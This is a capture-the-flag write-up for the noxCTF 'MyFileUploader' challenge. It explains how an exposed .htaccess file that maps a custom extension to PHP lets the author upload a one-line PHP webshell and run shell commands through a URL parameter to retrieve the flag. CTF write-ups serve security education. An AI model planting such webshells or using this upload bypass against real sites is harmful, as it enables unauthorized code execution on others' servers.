noxCTF – MyFileUploader writeup

We start the challenge with this URI:

http://chal.noxale.com:8079/

When I accessed this page I saw a file uploading page.
Tried to upload a webshell and saw I can’t upload a file that doesn’t have one of these extensions:

JPG, PNG, GIF

I tried to play with the extensions and put a “double extension” like this:
test.jpg.php

But it didn’t work.
The website cuts the PHP extension but not any other extensions – this allows me to upload a file with any extension except PHP.
When I uploaded a regular legit file it was saved in /uploads/ with the same name.

The uploads route has dir listing and inside the directory, there is another directory called “Don’t open” and inside this directory, there is HTACCESS file.

HTACCESS file is the configuration file for the web server.

.htaccess is a configuration file for use on web servers running the Apache Web Server software.

When a .htaccess file is placed in a directory which is in turn ‘loaded via the Apache Web Server’, then the .htaccess file is detected and executed by the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features that the Apache Web Server software has to offer.

normally you shouldn’t see this file but, in this case, it somehow(intentionally) accessible through the directory listing – great for us.

The file looks like this:

Options +Indexes
AddType application/x-httpd-php .cyb3r

What we could understand is that the cyb3r extension is treated as php file.
so we are trying to upload file named test.jpg.cyb3r with this content:

<?php
system($_GET["0"]);

This is an ugly webshell but I wanted just to succeed at this point
The file was uploaded successfully!

Now I can browse to

http://chal.noxale.com:8079/uploads/test.jpg.cyb3r?0=ls -la

My command was executed and the result returned successfully.

I got back a list of files and one dir: 7H3-FL4G-1S-H3r3

ls on this dir gives back one file name with the flag value:

noxCTF{N3V3R_7RU57_07H3R5}

This challenge was actually 5 min challenge 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *